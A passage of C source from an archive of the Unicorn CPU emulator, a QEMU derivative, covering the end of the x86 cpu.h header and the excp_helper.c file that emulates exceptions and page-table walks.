{ CPUState *cs = CPU(cpu); CPUX86State *env = &cpu->env; env->eip = 0; cpu_x86_load_seg_cache(env, R_CS, sipi_vector << 8, sipi_vector << 12, env->segs[R_CS].limit, env->segs[R_CS].flags); cs->halted = 0; } int cpu_x86_get_descr_debug(CPUX86State *env, unsigned int selector, target_ulong *base, unsigned int *limit, unsigned int *flags); /* op_helper.c */ /* used for debug or cpu save/restore */ /* cpu-exec.c */ /* the following helpers are only usable in user mode simulation as they can trigger unexpected exceptions */ void cpu_x86_load_seg(CPUX86State *s, int seg_reg, int selector); void cpu_x86_fsave(CPUX86State *s, target_ulong ptr, int data32); void cpu_x86_frstor(CPUX86State *s, target_ulong ptr, int data32); void cpu_x86_fxsave(CPUX86State *s, target_ulong ptr); void cpu_x86_fxrstor(CPUX86State *s, target_ulong ptr); /* you can call this signal handler from your SIGBUS and SIGSEGV signal handlers to inform the virtual CPU of exceptions. non zero is returned if the signal was handled by the virtual CPU. */ int cpu_x86_signal_handler(int host_signum, void *pinfo, void *puc); /* cpu.c */ void cpu_x86_cpuid(CPUX86State *env, uint32_t index, uint32_t count, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx); void cpu_clear_apic_feature(CPUX86State *env); void host_cpuid(uint32_t function, uint32_t count, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx); void host_vendor_fms(char *vendor, int *family, int *model, int *stepping); /* helper.c */ bool x86_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); void x86_cpu_set_a20(X86CPU *cpu, int a20_state); static inline int x86_asidx_from_attrs(CPUState *cs, MemTxAttrs attrs) { return !!attrs.secure; } static inline AddressSpace *cpu_addressspace(CPUState *cs, MemTxAttrs attrs) { return cpu_get_address_space(cs, cpu_asidx_from_attrs(cs, attrs)); } uint8_t x86_ldub_phys(CPUState *cs, hwaddr addr); uint32_t x86_lduw_phys(CPUState *cs, hwaddr addr); uint32_t x86_ldl_phys(CPUState *cs, hwaddr addr); uint64_t x86_ldq_phys(CPUState *cs, hwaddr addr); void x86_stb_phys(CPUState *cs, hwaddr addr, uint8_t val); void x86_stl_phys_notdirty(CPUState *cs, hwaddr addr, uint32_t val); void x86_stw_phys(CPUState *cs, hwaddr addr, uint32_t val); void x86_stl_phys(CPUState *cs, hwaddr addr, uint32_t val); void x86_stq_phys(CPUState *cs, hwaddr addr, uint64_t val); void breakpoint_handler(CPUState *cs); /* will be suppressed */ void cpu_x86_update_cr0(CPUX86State *env, uint32_t new_cr0); void cpu_x86_update_cr3(CPUX86State *env, target_ulong new_cr3); void cpu_x86_update_cr4(CPUX86State *env, uint32_t new_cr4); void cpu_x86_update_dr7(CPUX86State *env, uint32_t new_dr7); /* hw/pc.c */ uint64_t cpu_get_tsc(CPUX86State *env); /* XXX: This value should match the one returned by CPUID * and in exec.c */ # if defined(TARGET_X86_64) # define TCG_PHYS_ADDR_BITS 40 # else # define TCG_PHYS_ADDR_BITS 36 # endif #define PHYS_ADDR_MASK MAKE_64BIT_MASK(0, TCG_PHYS_ADDR_BITS) #define X86_CPU_TYPE_SUFFIX "-" TYPE_X86_CPU #define X86_CPU_TYPE_NAME(name) (name X86_CPU_TYPE_SUFFIX) #define CPU_RESOLVING_TYPE TYPE_X86_CPU #ifdef TARGET_X86_64 #define TARGET_DEFAULT_CPU_TYPE X86_CPU_TYPE_NAME("qemu64") #else #define TARGET_DEFAULT_CPU_TYPE X86_CPU_TYPE_NAME("qemu32") #endif #define cpu_signal_handler cpu_x86_signal_handler /* MMU modes definitions */ #define MMU_KSMAP_IDX 0 #define MMU_USER_IDX 1 #define MMU_KNOSMAP_IDX 2 static inline int cpu_mmu_index(CPUX86State *env, bool ifetch) { return (env->hflags & HF_CPL_MASK) == 3 ? MMU_USER_IDX : (!(env->hflags & HF_SMAP_MASK) || (env->eflags & AC_MASK)) ? MMU_KNOSMAP_IDX : MMU_KSMAP_IDX; } static inline int cpu_mmu_index_kernel(CPUX86State *env) { return !(env->hflags & HF_SMAP_MASK) ? MMU_KNOSMAP_IDX : ((env->hflags & HF_CPL_MASK) < 3 && (env->eflags & AC_MASK)) ? MMU_KNOSMAP_IDX : MMU_KSMAP_IDX; } #define CC_DST (env->cc_dst) #define CC_SRC (env->cc_src) #define CC_SRC2 (env->cc_src2) #define CC_OP (env->cc_op) /* n must be a constant to be efficient */ static inline target_long lshift(target_long x, int n) { if (n >= 0) { return x << n; } else { return x >> (-n); } } /* float macros */ #define FT0 (env->ft0) #define ST0 (env->fpregs[env->fpstt].d) #define ST(n) (env->fpregs[(env->fpstt + (n)) & 7].d) #define ST1 ST(1) /* translate.c */ void tcg_x86_init(struct uc_struct *uc); typedef CPUX86State CPUArchState; typedef X86CPU ArchCPU; #include "exec/cpu-all.h" #include "svm.h" static inline void cpu_get_tb_cpu_state(CPUX86State *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *cs_base = env->segs[R_CS].base; *pc = *cs_base + env->eip; *flags = env->hflags | (env->eflags & (IOPL_MASK | TF_MASK | RF_MASK | VM_MASK | AC_MASK)); } void do_cpu_init(X86CPU *cpu); void do_cpu_sipi(X86CPU *cpu); /* excp_helper.c */ void QEMU_NORETURN raise_exception(CPUX86State *env, int exception_index); void QEMU_NORETURN raise_exception_ra(CPUX86State *env, int exception_index, uintptr_t retaddr); void QEMU_NORETURN raise_exception_err(CPUX86State *env, int exception_index, int error_code); void QEMU_NORETURN raise_exception_err_ra(CPUX86State *env, int exception_index, int error_code, uintptr_t retaddr); void QEMU_NORETURN raise_interrupt(CPUX86State *nenv, int intno, int is_int, int error_code, int next_eip_addend); /* cc_helper.c */ extern const uint8_t parity_table[256]; uint32_t cpu_cc_compute_all(CPUX86State *env1, int op); static inline uint32_t cpu_compute_eflags(CPUX86State *env) { return (env->eflags & ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)) | cpu_cc_compute_all(env, CC_OP) | (env->df & DF_MASK); } /* NOTE: the translator must set DisasContext.cc_op to CC_OP_EFLAGS * after generating a call to a helper that uses this. */ static inline void cpu_load_eflags(CPUX86State *env, int eflags, int update_mask) { CC_SRC = eflags & (CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); CC_OP = CC_OP_EFLAGS; env->df = 1 - (2 * ((eflags >> 10) & 1)); env->eflags = (env->eflags & ~update_mask) | (eflags & update_mask) | 0x2; } /* load efer and update the corresponding hflags. XXX: do consistency checks with cpuid bits? */ static inline void cpu_load_efer(CPUX86State *env, uint64_t val) { env->efer = val; env->hflags &= ~(HF_LMA_MASK | HF_SVME_MASK); if (env->efer & MSR_EFER_LMA) { env->hflags |= HF_LMA_MASK; } if (env->efer & MSR_EFER_SVME) { env->hflags |= HF_SVME_MASK; } } static inline MemTxAttrs cpu_get_mem_attrs(CPUX86State *env) { if ((env->hflags & HF_SMM_MASK) != 0) return ((MemTxAttrs) { .secure = true }); else return ((MemTxAttrs) { .secure = false }); } static inline int32_t x86_get_a20_mask(CPUX86State *env) { if (env->hflags & HF_SMM_MASK) { return -1; } else { return env->a20_mask; } } static inline bool cpu_has_vmx(CPUX86State *env) { return env->features[FEAT_1_ECX] & CPUID_EXT_VMX; } /* * In order for a vCPU to enter VMX operation it must have CR4.VMXE set. * Since it was set, CR4.VMXE must remain set as long as vCPU is in * VMX operation. This is because CR4.VMXE is one of the bits set * in MSR_IA32_VMX_CR4_FIXED1. * * There is one exception to above statement when vCPU enters SMM mode. * When a vCPU enters SMM mode, it temporarily exit VMX operation and * may also reset CR4.VMXE during execution in SMM mode. * When vCPU exits SMM mode, vCPU state is restored to be in VMX operation * and CR4.VMXE is restored to it's original value of being set. * * Therefore, when vCPU is not in SMM mode, we can infer whether * VMX is being used by examining CR4.VMXE. Otherwise, we cannot * know for certain. */ static inline bool cpu_vmx_maybe_enabled(CPUX86State *env) { return cpu_has_vmx(env) && ((env->cr[4] & CR4_VMXE_MASK) || (env->hflags & HF_SMM_MASK)); } /* fpu_helper.c */ void update_fp_status(CPUX86State *env); void update_mxcsr_status(CPUX86State *env); static inline void cpu_set_mxcsr(CPUX86State *env, uint32_t mxcsr) { env->mxcsr = mxcsr; update_mxcsr_status(env); } static inline void cpu_set_fpuc(CPUX86State *env, uint16_t fpuc) { env->fpuc = fpuc; update_fp_status(env); } /* mem_helper.c */ void helper_lock_init(void); /* svm_helper.c */ void cpu_svm_check_intercept_param(CPUX86State *env1, uint32_t type, uint64_t param, uintptr_t retaddr); void QEMU_NORETURN cpu_vmexit(CPUX86State *nenv, uint32_t exit_code, uint64_t exit_info_1, uintptr_t retaddr); void do_vmexit(CPUX86State *env, uint32_t exit_code, uint64_t exit_info_1); /* seg_helper.c */ void do_interrupt_x86_hardirq(CPUX86State *env, int intno, int is_hw); /* smm_helper.c */ void do_smm_enter(X86CPU *cpu); /* Special values for X86CPUVersion: */ /* Resolve to latest CPU version */ #define CPU_VERSION_LATEST -1 /* * Resolve to version defined by current machine type. * See x86_cpu_set_default_version() */ #define CPU_VERSION_AUTO -2 /* Don't resolve to any versioned CPU models, like old QEMU versions */ #define CPU_VERSION_LEGACY 0 typedef int X86CPUVersion; /* * Set default CPU model version for CPU models having * version == CPU_VERSION_AUTO. */ void x86_cpu_set_default_version(X86CPUVersion version); /* Return name of 32-bit register, from a R_* constant */ const char *get_register_name_32(unsigned int reg); #define APIC_DEFAULT_ADDRESS 0xfee00000 #define APIC_SPACE_SIZE 0x100000 /* cpu.c */ bool cpu_is_bsp(X86CPU *cpu); void x86_cpu_xrstor_all_areas(X86CPU *cpu, const X86XSaveArea *buf); void x86_cpu_xsave_all_areas(X86CPU *cpu, X86XSaveArea *buf); void x86_update_hflags(CPUX86State* env); int uc_check_cpu_x86_load_seg(CPUX86State *env, int seg_reg, int sel); X86CPU *cpu_x86_init(struct uc_struct *uc); #endif /* I386_CPU_H */ �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/excp_helper.c��������������������������������������������������������0000664�0000000�0000000�00000053633�14675241067�0020606�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 exception helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "qemu/log.h" #include "exec/helper-proto.h" #include "sysemu/sysemu.h" #include "uc_priv.h" void helper_raise_interrupt(CPUX86State *env, int intno, int next_eip_addend) { raise_interrupt(env, intno, 1, 0, next_eip_addend); } void helper_raise_exception(CPUX86State *env, int exception_index) { raise_exception(env, exception_index); } /* * Check nested exceptions and change to double or triple fault if * needed. It should only be called, if this is not an interrupt. * Returns the new exception number. */ static int check_exception(CPUX86State *env, int intno, int *error_code, uintptr_t retaddr) { int first_contributory = env->old_exception == 0 || (env->old_exception >= 10 && env->old_exception <= 13); int second_contributory = intno == 0 || (intno >= 10 && intno <= 13); qemu_log_mask(CPU_LOG_INT, "check_exception old: 0x%x new 0x%x\n", env->old_exception, intno); if (env->old_exception == EXCP08_DBLE) { if (env->hflags & HF_GUEST_MASK) { cpu_vmexit(env, SVM_EXIT_SHUTDOWN, 0, retaddr); /* does not return */ } qemu_log_mask(CPU_LOG_RESET, "Triple fault\n"); qemu_system_reset_request(env->uc); return EXCP_HLT; } if ((first_contributory && second_contributory) || (env->old_exception == EXCP0E_PAGE && (second_contributory || (intno == EXCP0E_PAGE)))) { intno = EXCP08_DBLE; *error_code = 0; } if (second_contributory || (intno == EXCP0E_PAGE) || (intno == EXCP08_DBLE)) { env->old_exception = intno; } return intno; } /* * Signal an interruption. It is executed in the main CPU loop. * is_int is TRUE if coming from the int instruction. next_eip is the * env->eip value AFTER the interrupt instruction. It is only relevant if * is_int is TRUE. */ static void QEMU_NORETURN raise_interrupt2(CPUX86State *env, int intno, int is_int, int error_code, int next_eip_addend, uintptr_t retaddr) { CPUState *cs = env_cpu(env); if (!is_int) { cpu_svm_check_intercept_param(env, SVM_EXIT_EXCP_BASE + intno, error_code, retaddr); intno = check_exception(env, intno, &error_code, retaddr); } else { cpu_svm_check_intercept_param(env, SVM_EXIT_SWINT, 0, retaddr); } cs->exception_index = intno; env->error_code = error_code; env->exception_is_int = is_int; env->exception_next_eip = env->eip + next_eip_addend; cpu_loop_exit_restore(cs, retaddr); } /* shortcuts to generate exceptions */ void QEMU_NORETURN raise_interrupt(CPUX86State *env, int intno, int is_int, int error_code, int next_eip_addend) { raise_interrupt2(env, intno, is_int, error_code, next_eip_addend, 0); } void raise_exception_err(CPUX86State *env, int exception_index, int error_code) { raise_interrupt2(env, exception_index, 0, error_code, 0, 0); } void raise_exception_err_ra(CPUX86State *env, int exception_index, int error_code, uintptr_t retaddr) { raise_interrupt2(env, exception_index, 0, error_code, 0, retaddr); } void raise_exception(CPUX86State *env, int exception_index) { raise_interrupt2(env, exception_index, 0, 0, 0, 0); } void raise_exception_ra(CPUX86State *env, int exception_index, uintptr_t retaddr) { raise_interrupt2(env, exception_index, 0, 0, 0, retaddr); } static hwaddr get_hphys(CPUState *cs, hwaddr gphys, MMUAccessType access_type, int *prot) { CPUX86State *env = &X86_CPU(cs)->env; uint64_t rsvd_mask = PG_HI_RSVD_MASK; uint64_t ptep, pte; uint64_t exit_info_1 = 0; target_ulong pde_addr, pte_addr; uint32_t page_offset; int page_size; if (likely(!(env->hflags2 & HF2_NPT_MASK))) { return gphys; } if (!(env->nested_pg_mode & SVM_NPT_NXE)) { rsvd_mask |= PG_NX_MASK; } if (env->nested_pg_mode & SVM_NPT_PAE) { uint64_t pde, pdpe; target_ulong pdpe_addr; #ifdef TARGET_X86_64 if (env->nested_pg_mode & SVM_NPT_LMA) { uint64_t pml5e; uint64_t pml4e_addr, pml4e; pml5e = env->nested_cr3; ptep = PG_NX_MASK | PG_USER_MASK | PG_RW_MASK; pml4e_addr = (pml5e & PG_ADDRESS_MASK) + (((gphys >> 39) & 0x1ff) << 3); pml4e = x86_ldq_phys(cs, pml4e_addr); if (!(pml4e & PG_PRESENT_MASK)) { goto do_fault; } if (pml4e & (rsvd_mask | PG_PSE_MASK)) { goto do_fault_rsvd; } if (!(pml4e & PG_ACCESSED_MASK)) { pml4e |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pml4e_addr, pml4e); } ptep &= pml4e ^ PG_NX_MASK; pdpe_addr = (pml4e & PG_ADDRESS_MASK) + (((gphys >> 30) & 0x1ff) << 3); pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) { goto do_fault; } if (pdpe & rsvd_mask) { goto do_fault_rsvd; } ptep &= pdpe ^ PG_NX_MASK; if (!(pdpe & PG_ACCESSED_MASK)) { pdpe |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pdpe_addr, pdpe); } if (pdpe & PG_PSE_MASK) { /* 1 GB page */ page_size = 1024 * 1024 * 1024; pte_addr = pdpe_addr; pte = pdpe; goto do_check_protect; } } else #endif { pdpe_addr = (env->nested_cr3 & ~0x1f) + ((gphys >> 27) & 0x18); pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) { goto do_fault; } rsvd_mask |= PG_HI_USER_MASK; if (pdpe & (rsvd_mask | PG_NX_MASK)) { goto do_fault_rsvd; } ptep = PG_NX_MASK | PG_USER_MASK | PG_RW_MASK; } pde_addr = (pdpe & PG_ADDRESS_MASK) + (((gphys >> 21) & 0x1ff) << 3); pde = x86_ldq_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) { goto do_fault; } if (pde & rsvd_mask) { goto do_fault_rsvd; } ptep &= pde ^ PG_NX_MASK; if (pde & PG_PSE_MASK) { /* 2 MB page */ page_size = 2048 * 1024; pte_addr = pde_addr; pte = pde; goto do_check_protect; } /* 4 KB page */ if (!(pde & PG_ACCESSED_MASK)) { pde |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pde_addr, pde); } pte_addr = (pde & PG_ADDRESS_MASK) + (((gphys >> 12) & 0x1ff) << 3); pte = x86_ldq_phys(cs, pte_addr); if (!(pte & PG_PRESENT_MASK)) { goto do_fault; } if (pte & rsvd_mask) { goto do_fault_rsvd; } /* combine pde and pte nx, user and rw protections */ ptep &= pte ^ PG_NX_MASK; page_size = 4096; } else { uint32_t pde; /* page directory entry */ pde_addr = (env->nested_cr3 & ~0xfff) + ((gphys >> 20) & 0xffc); pde = x86_ldl_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) { goto do_fault; } ptep = pde | PG_NX_MASK; /* if PSE bit is set, then we use a 4MB page */ if ((pde & PG_PSE_MASK) && (env->cr[4] & CR4_PSE_MASK)) { page_size = 4096 * 1024; pte_addr = pde_addr; /* Bits 20-13 provide bits 39-32 of the address, bit 21 is reserved. * Leave bits 20-13 in place for setting accessed/dirty bits below. */ pte = pde | ((pde & 0x1fe000LL) << (32 - 13)); rsvd_mask = 0x200000; goto do_check_protect_pse36; } if (!(pde & PG_ACCESSED_MASK)) { pde |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pde_addr, pde); } /* page directory entry */ pte_addr = (pde & ~0xfff) + ((gphys >> 10) & 0xffc); pte = x86_ldl_phys(cs, pte_addr); if (!(pte & PG_PRESENT_MASK)) { goto do_fault; } /* combine pde and pte user and rw protections */ ptep &= pte | PG_NX_MASK; page_size = 4096; rsvd_mask = 0; } do_check_protect: rsvd_mask |= (page_size - 1) & PG_ADDRESS_MASK & ~PG_PSE_PAT_MASK; do_check_protect_pse36: if (pte & rsvd_mask) { goto do_fault_rsvd; } ptep ^= PG_NX_MASK; if (!(ptep & PG_USER_MASK)) { goto do_fault_protect; } if (ptep & PG_NX_MASK) { if (access_type == MMU_INST_FETCH) { goto do_fault_protect; } *prot &= ~PAGE_EXEC; } if (!(ptep & PG_RW_MASK)) { if (access_type == MMU_DATA_STORE) { goto do_fault_protect; } *prot &= ~PAGE_WRITE; } pte &= PG_ADDRESS_MASK & ~(page_size - 1); page_offset = gphys & (page_size - 1); return pte + page_offset; do_fault_rsvd: exit_info_1 |= SVM_NPTEXIT_RSVD; do_fault_protect: exit_info_1 |= SVM_NPTEXIT_P; do_fault: x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), gphys); exit_info_1 |= SVM_NPTEXIT_US; if (access_type == MMU_DATA_STORE) { exit_info_1 |= SVM_NPTEXIT_RW; } else if (access_type == MMU_INST_FETCH) { exit_info_1 |= SVM_NPTEXIT_ID; } if (prot) { exit_info_1 |= SVM_NPTEXIT_GPA; } else { /* page table access */ exit_info_1 |= SVM_NPTEXIT_GPT; } cpu_vmexit(env, SVM_EXIT_NPF, exit_info_1, env->retaddr); } /* return value: * -1 = cannot handle fault * 0 = nothing more to do * 1 = generate PF fault */ static int handle_mmu_fault(CPUState *cs, vaddr addr, int size, int is_write1, int mmu_idx) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; uint64_t ptep, pte; int32_t a20_mask; target_ulong pde_addr, pte_addr; int error_code = 0; int is_dirty, prot, page_size, is_write, is_user; hwaddr paddr; uint64_t rsvd_mask = PG_HI_RSVD_MASK; uint32_t page_offset; target_ulong vaddr; is_user = mmu_idx == MMU_USER_IDX; #if defined(DEBUG_MMU) printf("MMU fault: addr=%" VADDR_PRIx " w=%d u=%d eip=" TARGET_FMT_lx "\n", addr, is_write1, is_user, env->eip); #endif is_write = is_write1 & 1; a20_mask = x86_get_a20_mask(env); if (!(env->cr[0] & CR0_PG_MASK)) { pte = addr; #ifdef TARGET_X86_64 if (!(env->hflags & HF_LMA_MASK)) { /* Without long mode we can only address 32bits in real mode */ pte = (uint32_t)pte; } #endif prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; page_size = 4096; goto do_mapping; } if (!(env->efer & MSR_EFER_NXE)) { rsvd_mask |= PG_NX_MASK; } if (env->cr[4] & CR4_PAE_MASK) { uint64_t pde, pdpe; target_ulong pdpe_addr; #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { bool la57 = env->cr[4] & CR4_LA57_MASK; uint64_t pml5e_addr, pml5e; uint64_t pml4e_addr, pml4e; int32_t sext; /* test virtual address sign extension */ sext = la57 ? (int64_t)addr >> 56 : (int64_t)addr >> 47; if (sext != 0 && sext != -1) { env->error_code = 0; cs->exception_index = EXCP0D_GPF; return 1; } if (la57) { pml5e_addr = ((env->cr[3] & ~0xfff) + (((addr >> 48) & 0x1ff) << 3)) & a20_mask; pml5e_addr = get_hphys(cs, pml5e_addr, MMU_DATA_STORE, NULL); pml5e = x86_ldq_phys(cs, pml5e_addr); if (!(pml5e & PG_PRESENT_MASK)) { goto do_fault; } if (pml5e & (rsvd_mask | PG_PSE_MASK)) { goto do_fault_rsvd; } if (!(pml5e & PG_ACCESSED_MASK)) { pml5e |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pml5e_addr, pml5e); } ptep = pml5e ^ PG_NX_MASK; } else { pml5e = env->cr[3]; ptep = PG_NX_MASK | PG_USER_MASK | PG_RW_MASK; } pml4e_addr = ((pml5e & PG_ADDRESS_MASK) + (((addr >> 39) & 0x1ff) << 3)) & a20_mask; pml4e_addr = get_hphys(cs, pml4e_addr, MMU_DATA_STORE, false); pml4e = x86_ldq_phys(cs, pml4e_addr); if (!(pml4e & PG_PRESENT_MASK)) { goto do_fault; } if (pml4e & (rsvd_mask | PG_PSE_MASK)) { goto do_fault_rsvd; } if (!(pml4e & PG_ACCESSED_MASK)) { pml4e |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pml4e_addr, pml4e); } ptep &= pml4e ^ PG_NX_MASK; pdpe_addr = ((pml4e & PG_ADDRESS_MASK) + (((addr >> 30) & 0x1ff) << 3)) & a20_mask; pdpe_addr = get_hphys(cs, pdpe_addr, MMU_DATA_STORE, NULL); pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) { goto do_fault; } if (pdpe & rsvd_mask) { goto do_fault_rsvd; } ptep &= pdpe ^ PG_NX_MASK; if (!(pdpe & PG_ACCESSED_MASK)) { pdpe |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pdpe_addr, pdpe); } if (pdpe & PG_PSE_MASK) { /* 1 GB page */ page_size = 1024 * 1024 * 1024; pte_addr = pdpe_addr; pte = pdpe; goto do_check_protect; } } else #endif { /* XXX: load them when cr3 is loaded ? */ pdpe_addr = ((env->cr[3] & ~0x1f) + ((addr >> 27) & 0x18)) & a20_mask; pdpe_addr = get_hphys(cs, pdpe_addr, MMU_DATA_STORE, false); pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) { goto do_fault; } rsvd_mask |= PG_HI_USER_MASK; if (pdpe & (rsvd_mask | PG_NX_MASK)) { goto do_fault_rsvd; } ptep = PG_NX_MASK | PG_USER_MASK | PG_RW_MASK; } pde_addr = ((pdpe & PG_ADDRESS_MASK) + (((addr >> 21) & 0x1ff) << 3)) & a20_mask; pde_addr = get_hphys(cs, pde_addr, MMU_DATA_STORE, NULL); pde = x86_ldq_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) { goto do_fault; } if (pde & rsvd_mask) { goto do_fault_rsvd; } ptep &= pde ^ PG_NX_MASK; if (pde & PG_PSE_MASK) { /* 2 MB page */ page_size = 2048 * 1024; pte_addr = pde_addr; pte = pde; goto do_check_protect; } /* 4 KB page */ if (!(pde & PG_ACCESSED_MASK)) { pde |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pde_addr, pde); } pte_addr = ((pde & PG_ADDRESS_MASK) + (((addr >> 12) & 0x1ff) << 3)) & a20_mask; pte_addr = get_hphys(cs, pte_addr, MMU_DATA_STORE, NULL); pte = x86_ldq_phys(cs, pte_addr); if (!(pte & PG_PRESENT_MASK)) { goto do_fault; } if (pte & rsvd_mask) { goto do_fault_rsvd; } /* combine pde and pte nx, user and rw protections */ ptep &= pte ^ PG_NX_MASK; page_size = 4096; } else { uint32_t pde; /* page directory entry */ pde_addr = ((env->cr[3] & ~0xfff) + ((addr >> 20) & 0xffc)) & a20_mask; pde_addr = get_hphys(cs, pde_addr, MMU_DATA_STORE, NULL); pde = x86_ldl_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) { goto do_fault; } ptep = pde | PG_NX_MASK; /* if PSE bit is set, then we use a 4MB page */ if ((pde & PG_PSE_MASK) && (env->cr[4] & CR4_PSE_MASK)) { page_size = 4096 * 1024; pte_addr = pde_addr; /* Bits 20-13 provide bits 39-32 of the address, bit 21 is reserved. * Leave bits 20-13 in place for setting accessed/dirty bits below. */ pte = pde | ((pde & 0x1fe000LL) << (32 - 13)); rsvd_mask = 0x200000; goto do_check_protect_pse36; } if (!(pde & PG_ACCESSED_MASK)) { pde |= PG_ACCESSED_MASK; x86_stl_phys_notdirty(cs, pde_addr, pde); } /* page directory entry */ pte_addr = ((pde & ~0xfff) + ((addr >> 10) & 0xffc)) & a20_mask; pte_addr = get_hphys(cs, pte_addr, MMU_DATA_STORE, NULL); pte = x86_ldl_phys(cs, pte_addr); if (!(pte & PG_PRESENT_MASK)) { goto do_fault; } /* combine pde and pte user and rw protections */ ptep &= pte | PG_NX_MASK; page_size = 4096; rsvd_mask = 0; } do_check_protect: rsvd_mask |= (page_size - 1) & PG_ADDRESS_MASK & ~PG_PSE_PAT_MASK; do_check_protect_pse36: if (pte & rsvd_mask) { goto do_fault_rsvd; } ptep ^= PG_NX_MASK; /* can the page can be put in the TLB? prot will tell us */ if (is_user && !(ptep & PG_USER_MASK)) { goto do_fault_protect; } prot = 0; if (mmu_idx != MMU_KSMAP_IDX || !(ptep & PG_USER_MASK)) { prot |= PAGE_READ; if ((ptep & PG_RW_MASK) || (!is_user && !(env->cr[0] & CR0_WP_MASK))) { prot |= PAGE_WRITE; } } if (!(ptep & PG_NX_MASK) && (mmu_idx == MMU_USER_IDX || !((env->cr[4] & CR4_SMEP_MASK) && (ptep & PG_USER_MASK)))) { prot |= PAGE_EXEC; } if ((env->cr[4] & CR4_PKE_MASK) && (env->hflags & HF_LMA_MASK) && (ptep & PG_USER_MASK) && env->pkru) { uint32_t pk = (pte & PG_PKRU_MASK) >> PG_PKRU_BIT; uint32_t pkru_ad = (env->pkru >> pk * 2) & 1; uint32_t pkru_wd = (env->pkru >> pk * 2) & 2; uint32_t pkru_prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; if (pkru_ad) { pkru_prot &= ~(PAGE_READ | PAGE_WRITE); } else if (pkru_wd && (is_user || env->cr[0] & CR0_WP_MASK)) { pkru_prot &= ~PAGE_WRITE; } prot &= pkru_prot; if ((pkru_prot & (1 << is_write1)) == 0) { assert(is_write1 != 2); error_code |= PG_ERROR_PK_MASK; goto do_fault_protect; } } if ((prot & (1 << is_write1)) == 0) { goto do_fault_protect; } /* yes, it can! */ is_dirty = is_write && !(pte & PG_DIRTY_MASK); if (!(pte & PG_ACCESSED_MASK) || is_dirty) { pte |= PG_ACCESSED_MASK; if (is_dirty) { pte |= PG_DIRTY_MASK; } x86_stl_phys_notdirty(cs, pte_addr, pte); } if (!(pte & PG_DIRTY_MASK)) { /* only set write access if already dirty... otherwise wait for dirty access */ assert(!is_write); prot &= ~PAGE_WRITE; } do_mapping: pte = pte & a20_mask; /* align to page_size */ pte &= PG_ADDRESS_MASK & ~(page_size - 1); page_offset = addr & (page_size - 1); paddr = get_hphys(cs, pte + page_offset, is_write1, &prot); /* Even if 4MB pages, we map only one 4KB page in the cache to avoid filling it too fast */ vaddr = addr & TARGET_PAGE_MASK; paddr &= TARGET_PAGE_MASK; assert(prot & (1 << is_write1)); tlb_set_page_with_attrs(cs, vaddr, paddr, cpu_get_mem_attrs(env), prot, mmu_idx, page_size); return 0; do_fault_rsvd: error_code |= PG_ERROR_RSVD_MASK; do_fault_protect: error_code |= PG_ERROR_P_MASK; do_fault: error_code |= (is_write << PG_ERROR_W_BIT); if (is_user) error_code |= PG_ERROR_U_MASK; if (is_write1 == 2 && (((env->efer & MSR_EFER_NXE) && (env->cr[4] & CR4_PAE_MASK)) || (env->cr[4] & CR4_SMEP_MASK))) error_code |= PG_ERROR_I_D_MASK; if (env->intercept_exceptions & (1 << EXCP0E_PAGE)) { /* cr2 is not modified in case of exceptions */ x86_stq_phys(cs, env->vm_vmcb + offsetof(struct vmcb, control.exit_info_2), addr); } else { env->cr[2] = addr; } env->error_code = error_code; cs->exception_index = EXCP0E_PAGE; return 1; } bool x86_cpu_tlb_fill(CPUState *cs, vaddr addr, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; env->retaddr = retaddr; if (handle_mmu_fault(cs, addr, size, access_type, mmu_idx)) { /* FIXME: On error in get_hphys we have already jumped out. */ g_assert(!probe); raise_exception_err_ra(env, cs->exception_index, env->error_code, retaddr); } return true; } 